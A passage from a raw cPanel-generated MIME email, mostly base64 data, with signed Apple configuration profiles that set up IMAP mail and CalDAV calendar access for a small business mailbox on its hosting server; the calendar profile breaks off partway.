ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAKPD94cGFja2V0IGVuZD0idyI/Ph0AdIcAAAAgY0hSTQAAeiUAAICDAAD5/wAAgOkA AHUwAADqYAAAOpgAABdvkl/FRgAAAclJREFUeNrs1s+LjVEYB/DPHe7EYjY2wsaPjaZBZDQLEZGF hSwkNdlIWbC2UEr5D8ZGSX4sJJINaQjlNkn5lcVMSuSWaagZXImYrsU8N6fT6/JOkcV869T7nOc5 53vO83yf930rzWbT30aHf4AZklKYDQ6tKLvmODZiFpqo4CvquIlzmAQDz4KkHNbjcBv/HvTHGJ1u unb9QcxmXEHX70g6UI30VNEZ6enN4ibxrWB9H/YWkczBPlzCYzyN8QS30YNlSfwo1mElNuFatt/O n4WfwgJciIIW4QHmY14ydxeP4nkEDzGMRTG3NL1JJ862IYAaVmVz+ckbmCiW8FQxt2a+LyFLIc2T OJ/4v8ftUuzH8sSupyQ7suCLOIJP0QMTkaa0oV7gPQbQHUpaG/Et3ElJ+hLHmzhRIyPuxdzEvoqD MYrwDqfTmnRlaWoULNqS2UNtavg55Ps6JRlJApbgaPRGC1VsS+yP+IDVBZtfDjnfyAt/PUlZBcew O2oyhBNYnGz2KvpneyaEMbz8lbrO4AAWJr7uRJY9IfMWBqPotTKv+nqcfKwgZrBA3rem+z2pYQNO 4TnG8Rb3sCbs8cj1/TIklZkfif+O5McA9Y1iuiAu5qQAAAAASUVORK5CYII= --related-Cpanel::Email::Object-3239878-1726668495-0.704441909327247-- --alternative-Cpanel::Email::Object-3239878-1726668495-0.53728288774365-- --mixed-Cpanel::Email::Object-3239878-1726668495-0.249595216632738 Content-Type: application/octet-stream; x-unix-mode=0600; name="email-info@naturallights.biz.mobileconfig" Content-Disposition: attachment; filename="email-info@naturallights.biz.mobileconfig" Content-Transfer-Encoding: base64 MIIYKwYJKoZIhvcNAQcCoIIYHDCCGBgCAQExDzANBglghkgBZQMEAgEFADCCC5kGCSqGSIb3DQEH AaCCC4oEgguGPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjwhRE9DVFlQ RSBwbGlzdCBQVUJMSUMgIi0vL0FwcGxlLy9EVEQgUExJU1QgMS4wLy9FTiIgImh0dHA6Ly93d3cu YXBwbGUuY29tL0RURHMvUHJvcGVydHlMaXN0LTEuMC5kdGQiPg0KPHBsaXN0IHZlcnNpb249IjEu MCI+DQo8ZGljdD4NCiAgPGtleT5QYXlsb2FkQ29udGVudDwva2V5Pg0KICA8YXJyYXk+DQogICAg PGRpY3Q+DQogICAgICA8a2V5PkVtYWlsQWNjb3VudERlc2NyaXB0aW9uPC9rZXk+DQogICAgICA8 c3RyaW5nPmluZm9AbmF0dXJhbGxpZ2h0cy5iaXo8L3N0cmluZz4NCiAgICAgIDxrZXk+RW1haWxB Y2NvdW50TmFtZTwva2V5Pg0KICAgICAgPHN0cmluZz5pbmZvQG5hdHVyYWxsaWdodHMuYml6PC9z dHJpbmc+DQogICAgICA8a2V5PkVtYWlsQWNjb3VudFR5cGU8L2tleT4NCiAgICAgIDxzdHJpbmc+ RW1haWxUeXBlSU1BUDwvc3RyaW5nPg0KICAgICAgPGtleT5FbWFpbEFkZHJlc3M8L2tleT4NCiAg ICAgIDxzdHJpbmc+aW5mb0BuYXR1cmFsbGlnaHRzLmJpejwvc3RyaW5nPg0KICAgICAgPGtleT5J bmNvbWluZ01haWxTZXJ2ZXJBdXRoZW50aWNhdGlvbjwva2V5Pg0KICAgICAgPHN0cmluZz5FbWFp bEF1dGhQYXNzd29yZDwvc3RyaW5nPg0KICAgICAgPGtleT5JbmNvbWluZ01haWxTZXJ2ZXJIb3N0 TmFtZTwva2V5Pg0KICAgICAgPHN0cmluZz5tZ2gtd2ViMTEubWFnaG9zdC5ybzwvc3RyaW5nPg0K ICAgICAgPGtleT5JbmNvbWluZ01haWxTZXJ2ZXJQb3J0TnVtYmVyPC9rZXk+DQogICAgICA8aW50 ZWdlcj45OTM8L2ludGVnZXI+DQogICAgICA8a2V5PkluY29taW5nTWFpbFNlcnZlclVzZVNTTDwv a2V5Pg0KICAgICAgPHRydWUvPg0KICAgICAgPGtleT5JbmNvbWluZ01haWxTZXJ2ZXJVc2VybmFt ZTwva2V5Pg0KICAgICAgPHN0cmluZz5pbmZvQG5hdHVyYWxsaWdodHMuYml6PC9zdHJpbmc+DQog ICAgICA8a2V5Pk91dGdvaW5nTWFpbFNlcnZlckF1dGhlbnRpY2F0aW9uPC9rZXk+DQogICAgICA8 c3RyaW5nPkVtYWlsQXV0aFBhc3N3b3JkPC9zdHJpbmc+DQogICAgICA8a2V5Pk91dGdvaW5nTWFp bFNlcnZlckhvc3ROYW1lPC9rZXk+DQogICAgICA8c3RyaW5nPm1naC13ZWIxMS5tYWdob3N0LnJv PC9zdHJpbmc+DQogICAgICA8a2V5Pk91dGdvaW5nTWFpbFNlcnZlclBvcnROdW1iZXI8L2tleT4N CiAgICAgIDxpbnRlZ2VyPjQ2NTwvaW50ZWdlcj4NCiAgICAgIDxrZXk+T3V0Z29pbmdNYWlsU2Vy dmVyVXNlU1NMPC9rZXk+DQogICAgICA8dHJ1ZS8+DQogICAgICA8a2V5Pk91dGdvaW5nTWFpbFNl cnZlclVzZXJuYW1lPC9rZXk+DQogICAgICA8c3RyaW5nPmluZm9AbmF0dXJhbGxpZ2h0cy5iaXo8 L3N0cmluZz4NCiAgICAgIDxrZXk+T3V0Z29pbmdQYXNzd29yZFNhbWVBc0luY29taW5nUGFzc3dv cmQ8L2tleT4NCiAgICAgIDx0cnVlLz4NCiAgICAgIDxrZXk+UGF5bG9hZERlc2NyaXB0aW9uPC9r ZXk+DQogICAgICA8c3RyaW5nPmluZm9AbmF0dXJhbGxpZ2h0cy5iaXogU2VjdXJlIEVtYWlsIFNl dHVwPC9zdHJpbmc+DQogICAgICA8a2V5PlBheWxvYWREaXNwbGF5TmFtZTwva2V5Pg0KICAgICAg PHN0cmluZz5pbmZvQG5hdHVyYWxsaWdodHMuYml6IFNlY3VyZSBFbWFpbCBTZXR1cDwvc3RyaW5n Pg0KICAgICAgPGtleT5QYXlsb2FkSWRlbnRpZmllcjwva2V5Pg0KICAgICAgPHN0cmluZz5jcGFu ZWwubWFpbC5vcmcuaW5mby5uYXR1cmFsbGlnaHRzLmJpejwvc3RyaW5nPg0KICAgICAgPGtleT5Q YXlsb2FkT3JnYW5pemF0aW9uPC9rZXk+DQogICAgICA8c3RyaW5nPm5hdHVyYWxsaWdodHMuYml6 PC9zdHJpbmc+DQogICAgICA8a2V5PlBheWxvYWRUeXBlPC9rZXk+DQogICAgICA8c3RyaW5nPmNv bS5hcHBsZS5tYWlsLm1hbmFnZWQ8L3N0cmluZz4NCiAgICAgIDxrZXk+UGF5bG9hZFVVSUQ8L2tl eT4NCiAgICAgIDxzdHJpbmc+OTczM2ZlYTctMjczYy05NTQ0LWNkYWUtNjQ2NmRiNmFmYjhmPC9z dHJpbmc+DQogICAgICA8a2V5PlBheWxvYWRWZXJzaW9uPC9rZXk+DQogICAgICA8aW50ZWdlcj4x PC9pbnRlZ2VyPg0KICAgICAgPGtleT5QcmV2ZW50QXBwU2hlZXQ8L2tleT4NCiAgICAgIDxmYWxz ZS8+DQogICAgICA8a2V5PlByZXZlbnRNb3ZlPC9rZXk+DQogICAgICA8ZmFsc2UvPg0KICAgICAg PGtleT5TTUlNRUVuYWJsZWQ8L2tleT4NCiAgICAgIDxmYWxzZS8+DQogICAgICA8a2V5PkluY29t aW5nTWFpbFNlcnZlcklNQVBQYXRoUHJlZml4PC9rZXk+DQogICAgICA8c3RyaW5nPklOQk9YPC9z dHJpbmc+DQogICAgPC9kaWN0Pg0KICA8L2FycmF5Pg0KICA8a2V5PlBheWxvYWREZXNjcmlwdGlv bjwva2V5Pg0KICA8c3RyaW5nPmluZm9AbmF0dXJhbGxpZ2h0cy5iaXogU2VjdXJlIEVtYWlsIFNl dHVwPC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZERpc3BsYXlOYW1lPC9rZXk+DQogIDxzdHJpbmc+ aW5mb0BuYXR1cmFsbGlnaHRzLmJpeiBTZWN1cmUgRW1haWwgU2V0dXA8L3N0cmluZz4NCiAgPGtl eT5QYXlsb2FkSWRlbnRpZmllcjwva2V5Pg0KICA8c3RyaW5nPmNwYW5lbC5tYWlsLm9yZy5pbmZv Lm5hdHVyYWxsaWdodHMuYml6LWVtYWlsPC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZE9yZ2FuaXph dGlvbjwva2V5Pg0KICA8c3RyaW5nPmNwYW5lbC5tYWlsLm9yZy5pbmZvLm5hdHVyYWxsaWdodHMu Yml6PC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZFJlbW92YWxEaXNhbGxvd2VkPC9rZXk+DQogIDxm YWxzZS8+DQogIDxrZXk+UGF5bG9hZFR5cGU8L2tleT4NCiAgPHN0cmluZz5Db25maWd1cmF0aW9u PC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZFVVSUQ8L2tleT4NCiAgPHN0cmluZz4wYWIzOGUwMy0x ODM1LWZmNjQtYjZhYS04NjVlOGEyMTY1ZWU8L3N0cmluZz4NCiAgPGtleT5QYXlsb2FkVmVyc2lv bjwva2V5Pg0KICA8aW50ZWdlcj4xPC9pbnRlZ2VyPg0KPC9kaWN0Pg0KPC9wbGlzdD4NCqCCCgQw ggUFMIIC7aADAgECAhBLqFKT95ovonMGS6gEjXXQMA0GCSqGSIb3DQEBCwUAME8xCzAJBgNVBAYT AlVTMSkwJwYDVQQKEyBJbnRlcm5ldCBTZWN1cml0eSBSZXNlYXJjaCBHcm91cDEVMBMGA1UEAxMM SVNSRyBSb290IFgxMB4XDTI0MDMxMzAwMDAwMFoXDTI3MDMxMjIzNTk1OVowMzELMAkGA1UEBhMC VVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxDDAKBgNVBAMTA1IxMDCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAM9X5ebEVBLttEf+ySdYdkZQKIwdPojfBZ3VtRgpvd21Wr/69s6jvq8A IUtiWlo8AS/FWAP2if+OEUPrwbXgFAeWj28f1+e6gTkJdWW3wq8YWzcmKOej9AcrbRr/q1i8la5A /+nLV8S1W394DRhhvBfnVMa7SZHNbhjRgIXupmU2vHTqvFBM6vwh8zgWk5S6sNNrOAbNFhJ6ylJ1 yK12ssKcXZhFXG9he8Yt7jwTUoYB2VfmOBzfjbUfkpGa50oczEWoclXwsOajB+z9pxtmnj9Ii3GE cVjJOvrvXvJbRCs8dOePskfBB2rNmrcNlvcSgSZRVArsYfb39eLyisiVDY0CAwEAAaOB+DCB9TAO BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIGA1UdEwEB/wQI MAYBAf8CAQAwHQYDVR0OBBYEFLu8w0el5LypxsOkcgwQjaI14cjoMB8GA1UdIwQYMBaAFHm0WeZ7 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 --mixed-Cpanel::Email::Object-3239878-1726668495-0.249595216632738 Content-Type: application/octet-stream; x-unix-mode=0600; name="caldav-info@naturallights.biz.mobileconfig" Content-Disposition: attachment; filename="caldav-info@naturallights.biz.mobileconfig" Content-Transfer-Encoding: base64 MIIUkgYJKoZIhvcNAQcCoIIUgzCCFH8CAQExDzANBglghkgBZQMEAgEFADCCCAAGCSqGSIb3DQEH AaCCB/EEggftPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjwhRE9DVFlQ RSBwbGlzdCBQVUJMSUMgIi0vL0FwcGxlLy9EVEQgUExJU1QgMS4wLy9FTiIgImh0dHA6Ly93d3cu YXBwbGUuY29tL0RURHMvUHJvcGVydHlMaXN0LTEuMC5kdGQiPg0KPHBsaXN0IHZlcnNpb249IjEu MCI+DQo8ZGljdD4NCiAgPGtleT5QYXlsb2FkQ29udGVudDwva2V5Pg0KICA8YXJyYXk+DQogICAg PGRpY3Q+DQogICAgICAgIDxrZXk+Q2FsREFWQWNjb3VudERlc2NyaXB0aW9uPC9rZXk+DQogICAg ICAgIDxzdHJpbmc+aW5mb0BuYXR1cmFsbGlnaHRzLmJpejwvc3RyaW5nPg0KICAgICAgICA8a2V5 PkNhbERBVkhvc3ROYW1lPC9rZXk+DQogICAgICAgIDxzdHJpbmc+bWdoLXdlYjExLm1hZ2hvc3Qu cm88L3N0cmluZz4NCiAgICAgICAgPGtleT5DYWxEQVZQb3J0PC9rZXk+DQogICAgICAgIDxpbnRl Z2VyPjIwODA8L2ludGVnZXI+DQogICAgICAgIDxrZXk+Q2FsREFWUHJpbmNpcGFsVVJMPC9rZXk+ DQogICAgICAgIDxzdHJpbmc+L3ByaW5jaXBhbHMvaW5mb0BuYXR1cmFsbGlnaHRzLmJpejwvc3Ry aW5nPg0KICAgICAgICA8a2V5PkNhbERBVlVzZVNTTDwva2V5Pg0KICAgICAgICA8dHJ1ZS8+DQog ICAgICAgIDxrZXk+Q2FsREFWVXNlcm5hbWU8L2tleT4NCiAgICAgICAgPHN0cmluZz5pbmZvQG5h dHVyYWxsaWdodHMuYml6PC9zdHJpbmc+DQogICAgICAgIDxrZXk+UGF5bG9hZERlc2NyaXB0aW9u 